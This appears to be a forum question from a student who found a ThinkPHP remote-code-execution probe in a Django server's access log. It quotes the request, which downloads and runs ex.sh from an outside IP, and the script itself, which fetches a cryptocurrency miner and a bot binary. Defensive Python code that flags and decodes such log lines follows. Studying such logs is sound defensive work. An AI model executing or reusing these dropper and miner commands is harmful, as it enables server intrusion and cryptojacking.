I developed a Django application for a school project and I hosted it on an EC2 instance to test and learn the environment.
During inspection of the logs, I found the following GET request,
"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://205.185.113.123/ex.sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1" 200 9472
This seems strange because I don't use PHP. I guess that someone assumed I use PHP, then tried to download and run a script ex.sh from 205.185.113.123. The content of that script is,
cd /tmp; wget http://205.185.113.123/mcoin; chmod 777 mcoin; ./mcoin -o 205.185.113.123:3333 -p x -k -a cryptonight -B --max-cpu-usage=90; rm -rf RjsWs
cd /tmp; wget http://205.185.113.123/sefa.x86; chmod 777 sefa.x86; ./sefa.x86 xd
rm -rf ex.sh
Since I don't know web apps and security much, I have some questions,
- Is this an attack? If so, what is the name of this attack?
- Can this attack be adapted for Django instead of PHP?
- Is this normal for web apps? Do they always get these kinds of requests?
- According to https://ipinfo.info/, the IP address is registered for a company called FranTech Solutions. Are they related to this attack?
- Is this illegal? If so, can I take legal action?
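A defender-side way to pick such requests out of an access log, as an added example that is not part of the question: it parses combined-format log lines, URL-decodes the request target, and flags the markers visible in the quoted request (a PHP entry point on an app that serves no PHP, function names that hand a string to a shell, a remote download, and a 200 response to such a request). The log lines are constructed for this example; only the request line itself is the one from the question, and the client IPs, timestamps and the second, benign line are made up.

```python
import re
from urllib.parse import unquote

# Constructed sample in Apache/nginx combined format. The first request line is
# the one quoted in the question; client IPs, timestamps and line two are made up.
SAMPLE_LOG = r'''198.51.100.7 - - [10/Mar/2019:03:12:44 +0000] "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://205.185.113.123/ex.sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1" 200 9472 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Mar/2019:03:13:01 +0000] "GET /accounts/login/?next=/dashboard/ HTTP/1.1" 200 2301 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+)'
)
PHP_PATH = re.compile(r'\.php(?:$|[?/])', re.IGNORECASE)
# Markers taken directly from the request in the question.
EXEC_MARKERS = ('invokefunction', 'call_user_func_array', 'shell_exec')


def parse_line(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry['status'] = int(entry['status'])
    entry['decoded'] = unquote(entry['target'])  # %20 -> space etc.
    return entry


def classify(entry):
    """Return the reasons this request looks suspicious (empty list if none)."""
    reasons = []
    path = entry['decoded'].split('?', 1)[0]
    lowered = entry['decoded'].lower()
    if PHP_PATH.search(path):
        reasons.append('php entry point on a non-PHP app')
    hits = [mk for mk in EXEC_MARKERS if mk in lowered]
    if hits:
        reasons.append('code-execution markers: ' + ', '.join(hits))
    if 'wget ' in lowered or 'curl ' in lowered:
        reasons.append('fetches a remote file')
    if reasons and entry['status'] == 200:
        reasons.append('server answered 200, check what was actually served')
    return reasons


def embedded_command(decoded_target):
    """Return the shell command carried in the vars[1][] parameter, if any."""
    for pair in decoded_target.partition('?')[2].split('&'):
        key, _, value = pair.partition('=')
        if key == 'vars[1][]':
            return value
    return None


def scan(log_text):
    """Return one finding per suspicious line: ip, status, reasons, decoded target."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and (reasons := classify(entry)):
            findings.append({'ip': entry['ip'], 'status': entry['status'],
                             'reasons': reasons, 'decoded_target': entry['decoded']})
    return findings
```

Run `scan` over your real access log to get every flagged line with its decoded target, then `embedded_command` on a flagged target shows the dropper command in the clear, which is what you would quote in an abuse report to the hosting provider.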